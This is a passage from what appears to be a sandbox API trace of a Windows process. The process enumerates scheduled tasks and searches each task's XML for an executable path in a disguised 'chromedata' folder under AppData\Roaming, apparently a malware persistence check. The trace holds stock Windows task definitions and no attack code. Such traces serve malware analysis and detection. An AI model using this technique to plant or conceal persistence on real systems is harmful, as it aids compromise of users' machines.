<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"WinSQMAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"WinSQMAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\wsqmcons.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.533] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator</URI>\r\n    <Source>$(@%systemRoot%\\system32\\wsqmcons.exe,-106)</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>$(@%systemRoot%\\system32\\wsqmcons.exe,-107)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2004-01-02T00:00:00</StartBoundary>\r\n      <Repetition>\r\n        <Interval>PT19H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"WinSQMAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"WinSQMAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\wsqmcons.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.534] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.534] IRegisteredTaskCollection:get_Item (in: This=0x55ff08, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.534] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="KernelCeipTask") returned 0x0
	[0073.534] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\kernelceip.dll,-600)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\kernelceip.dll,-601)</Source>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask</URI>\r\n    <Description>$(@%SystemRoot%\\system32\\kernelceip.dll,-602)</Description>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-09-01T03:30:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Thursday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT17H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RequiredPrivileges>\r\n        <Privilege>SeChangeNotifyPrivilege</Privilege>\r\n      </RequiredPrivileges>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{e7ed314f-2816-4c26-aeb5-54a34d02404c}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.535] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\kernelceip.dll,-600)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\kernelceip.dll,-601)</Source>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask</URI>\r\n    <Description>$(@%SystemRoot%\\system32\\kernelceip.dll,-602)</Description>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-09-01T03:30:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Thursday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT17H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RequiredPrivileges>\r\n        <Privilege>SeChangeNotifyPrivilege</Privilege>\r\n      </RequiredPrivileges>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{e7ed314f-2816-4c26-aeb5-54a34d02404c}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.536] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.536] IRegisteredTaskCollection:get_Item (in: This=0x55ff08, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.536] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="UsbCeip") returned 0x0
	[0073.536] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%SystemRoot%\\system32\\usbceip.dll,-601)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\usbceip.dll,-600)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\usbceip.dll,-602)</Description>\r\n    <URI>Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip</URI>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-04-25T01:30:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>3</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c27f6b1d-fe0b-45e4-9257-38799fa69bc8}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.538] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%SystemRoot%\\system32\\usbceip.dll,-601)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\usbceip.dll,-600)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\usbceip.dll,-602)</Description>\r\n    <URI>Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip</URI>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-04-25T01:30:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>3</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c27f6b1d-fe0b-45e4-9257-38799fa69bc8}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.538] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.538] IUnknown:Release (This=0x55ff08) returned 0x0
	[0073.538] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55ff08) returned 0x0
	[0073.538] ITaskFolderCollection:get_Count (in: This=0x55ff08, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.538] IUnknown:Release (This=0x55ff08) returned 0x0
	[0073.539] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.539] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x8, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.539] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.539] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.539] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.539] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="ScheduledDefrag") returned 0x0
	[0073.539] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\defragsvc.dll,-800)</Source>\r\n    <Author>$(@%systemroot%\\system32\\defragsvc.dll,-801)</Author>\r\n    <Description>$(@%systemroot%\\system32\\defragsvc.dll,-802)</Description>\r\n    <URI>Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"DefragWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Wednesday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n      <RandomDelay>PT2H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>P7D</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\defrag.exe</Command>\r\n      <Arguments>-c</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.541] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\defragsvc.dll,-800)</Source>\r\n    <Author>$(@%systemroot%\\system32\\defragsvc.dll,-801)</Author>\r\n    <Description>$(@%systemroot%\\system32\\defragsvc.dll,-802)</Description>\r\n    <URI>Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"DefragWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Wednesday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n      <RandomDelay>PT2H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>P7D</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\defrag.exe</Command>\r\n      <Arguments>-c</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.541] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.541] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.541] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.541] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.541] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.541] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.541] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x9, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.541] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.542] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.542] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.542] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Scheduled") returned 0x0
	[0073.542] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\sdiagschd.dll,-101)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sdiagschd.dll,-102)</Source>\r\n    <Description>$(@%systemroot%\\system32\\sdiagschd.dll,-103)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Diagnosis\\Scheduled</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT8H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{c1f85ef8-bcc2-4606-bb39-70c523715eb3}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.543] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\sdiagschd.dll,-101)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sdiagschd.dll,-102)</Source>\r\n    <Description>$(@%systemroot%\\system32\\sdiagschd.dll,-103)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Diagnosis\\Scheduled</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT8H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{c1f85ef8-bcc2-4606-bb39-70c523715eb3}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.544] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.544] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.544] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.544] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.544] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.544] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.544] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xa, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.544] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed8) returned 0x0
	[0073.545] IRegisteredTaskCollection:get_Count (in: This=0x55fed8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.545] IRegisteredTaskCollection:get_Item (in: This=0x55fed8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.545] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0
